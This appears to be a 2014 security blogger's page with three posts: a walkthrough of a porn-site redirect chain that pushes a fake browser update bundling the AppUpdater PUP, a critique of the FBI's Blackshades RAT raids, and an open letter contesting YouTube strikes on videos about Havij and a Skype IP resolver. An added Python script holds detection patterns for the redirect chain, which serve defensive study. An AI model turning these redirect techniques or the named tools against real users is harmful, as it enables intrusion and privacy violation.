Thursday 19 June 2014

Let Me Update That For You


This all starts off where a lot of suspicious activity is held, within porn. I was researching some suspicious URLs via URLquery when I came across a link with the pattern /sTDS/go.php?sid=IDNUMBER

This traffic distribution system was very easy to get to grips with, and had a fair amount of sites being redirected. Most sites were porn, which led to downloading something.
In this particular site we can see that there is a call for this strange URL circled. This is where we begin our journey in updating our systems due to the friendly reminders from our good ol' porn sites.
First we go to an image, which I can only think of as being a tracker of some sort, most likely for statistics. The most interesting part of this page is the top.location.href, from the URL it seems like we will be downloading something fairly soon.
Oh good. Seems like our browser software is out of date? :(( Thanks MR dodgy site for telling me to update my systems, looks like I was close to infection! An alert too, which makes this all the more legitimate for me to take action on this.

I will point out I had closed a window which was just basically hovering over this, same idea. Plz download my exe noaw. Everything on this page will most likely redirect you to their exe, setup.exe.

It's okay, they last checked at 19/6/2014, they know what they're doing!

I didn't know I was getting a premium installer! 
The main attraction, AppUpdater, common PUP. I will decline, thanks.
After installing the wonderful software they have been paid to show, you have these wonderful instructions from them, giving you a step by step on what to do after the installation. Thank god for that, I didn't exactly know how to start search for a program. What also got me here was their wonderful use of doubleclick.net advertising, which is owned by Google.

10/10 PUP.
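
The chain described in this post (a `/sTDS/go.php?sid=` hop, a page that sets `top.location.href`, then a `setup.exe` download) can be triaged from proxy logs. The following is an added example, not code from the original post; the hostnames, the sample session and the assumption that `sid` is numeric are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Redirector path pattern from the post: /sTDS/go.php?sid=IDNUMBER
TDS_PATH = re.compile(r"/stds/go\.php$", re.IGNORECASE)
# Script that navigates the top-level window, as seen on the landing page
TOP_NAV = re.compile(r"""top\.location\.href\s*=\s*(['"])(.+?)\1""", re.IGNORECASE)

def is_tds_hop(url):
    """True for the sTDS redirector path with a numeric sid (assumed numeric)."""
    parts = urlsplit(url)
    sid = parse_qs(parts.query).get("sid", [""])[0]
    return bool(TDS_PATH.search(parts.path)) and sid.isdigit()

def forced_navigations(html):
    """Return every URL a response body assigns to top.location.href."""
    return [m.group(2) for m in TOP_NAV.finditer(html)]

def is_exe_download(url):
    return urlsplit(url).path.lower().endswith(".exe")

def triage(requests, bodies):
    """requests: URLs of one browsing session in order; bodies: url -> HTML."""
    findings, seen_tds = [], False
    for url in requests:
        if is_tds_hop(url):
            seen_tds = True
            findings.append(("tds_redirector", url))
        for target in forced_navigations(bodies.get(url, "")):
            findings.append(("forced_top_navigation", target))
        # An .exe fetched after a TDS hop is the pattern worth alerting on
        if seen_tds and is_exe_download(url):
            findings.append(("exe_after_tds", url))
    return findings

# Constructed sample session (reserved .example hostnames, not real indicators)
SAMPLE_REQUESTS = [
    "http://adult-site.example/video/1",
    "http://tds.example/sTDS/go.php?sid=7",
    "http://landing.example/update/index.html",
    "http://landing.example/update/setup.exe",
]
SAMPLE_BODIES = {
    "http://landing.example/update/index.html":
        '<img src="http://stats.example/t.gif">'
        '<script>alert("Your browser is out of date");'
        'top.location.href = "http://landing.example/update/setup.exe";</script>',
}

if __name__ == "__main__":
    for kind, url in triage(SAMPLE_REQUESTS, SAMPLE_BODIES):
        print(kind, url)
```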


Tuesday 20 May 2014

FBI Raids On Blackshades - All Bang Bang No Kiss Kiss

Most people won't like this article, mostly due to me having a little dig at the FBI. This isn't because I have some personal vendetta against them, it's mostly due to me witnessing the events that have happened in the past week, and disliking them. Most of the community has taken the news quite well. As the media doesn't point out, Blackshades was one of those products beginners used when getting into infecting users. The prime target for this product was a young teenager looking to become a big hacker. You are correct in saying it was used to hack into Miss Teen USA, which later led to the user holding her to ransom because he had captured nudes. One of the big points in this story was that he was a Californian computer science school student. A relatively young adult who is fairly inexperienced in what he did, he tried to get her to contact him via the popular service Skype.

Whatever you say about Blackshades, it was, to me, an attractive product to skids. Easy to use, enough function for the common user, and not too expensive for their mums to pay with their PayPal. And before you say, yes, I did cover two Blackshades products on my channel. I did not infect anyone with it, and it was used to educate people on the products, as it was never "labelled" illegal then. It had a large following of users on the ever popular "hacking" forum hackforums (wink wink). It seemed like the right thing to do, in which I could drive more views to my channel, and I do not regret my choice, because it did.

When a few members on HackForums reported back that they had been raided, there was a lot of panic. A lot of members started to get worried, and started to ask a lot of questions. You could see by the posts that were made how young the users were and how scared they were. I'm not trying to reach out to Blackshades purchasers one bit, I'm trying to shed new light on what seems like the FBI's idea of a successful day. Excuse me, but even if, to me, your over-inflated facts about Blackshades are true, I feel like you're missing out on an important opportunity. The product was marketed in a forum notoriously filled with kids just starting out. Instead of scaring the shit out of kids because of their stupid mistakes, I thought you would be able to somehow convert their interest to the white side of things, make Cyber Security actually interesting for the younger generation. And when I say this, I'm not having a go at current course content, or educators currently within the system helping students learn. I'm talking about making it an attractive career opportunity for various forum users around the world.

What Blackshades did for young users is create knowledge of how basic Remote Administration Tools are used. The FBI and services alike could have utilised this opportunity to find a talent pool. Only a few months back I remember stories stating a shortage in Cyber Security professionals, why not train young kids who are interested in this sort of thing? I'm not saying any of these forum users are angels, no one is, but the money used in this operation could have been used to contact and train these individuals to give them motivation into moving to the other side of computer security.





Friday 16 May 2014

YouTube Terminates InfoSec YouTuber "LinkCabin" - My Open Letter To YouTube

I feel like the strikes that were made on my account were inappropriate and false. I have had a YouTube channel for over 2 years and had no problems with my content. All of the content flagged was content over a year old. I was not told at any point what the offense was on my video, simply that I had broken "Community Guidelines".

Now I know you must follow a guideline for the site, but all of the rules I read on the community guidelines were not broken, I'm not trying to "lawyer" my way out. I have had no explanation whatsoever of what I've done wrong with my content.

  • Appropriate steps were made to keep people's privacy
  • None of the content was copyrighted, all content was my video and audio
  • All 3 strikes were given in the space of 3 days

I know you guys don't have a lot of time, but it would be great to understand why. All my videos are related to cyber security and are a major asset to various people across the internet. Since the termination I have received a lot of messages asking what's happened to my YouTube channel.

I have been responsible with my brand and have abided by many of the rules that YouTube has in place. I'm unsure if this is someone being malicious by mass flagging my videos or whether this was completely intentional on your part.

My network saw no problem with my videos and has tried to be in contact with you about why you have decided to take action.

I would like to resolve this matter, as I put a lot of research and hard work into every single video I had for 2 years, which people were starting to see. Please don't pass this aside simply because this is long, it shows that I am passionate about my channel and what I do. I do not wish to lose it.

YouTube channel: linkcabin
Strike Videos:
"How To Use Havij 1.1.5 - Introduction to the tool (Part 1)" (http://youtu.be/5f_gSMSg5Do)
"Free Web Skype Resolver | Fast | Online | HD 720" (http://youtu.be/XBGaXGPKPmk)
"Unblock the PirateBay forever! - 90MB - thepiratebay.se" (http://youtu.be/QjRQzTHDkKg)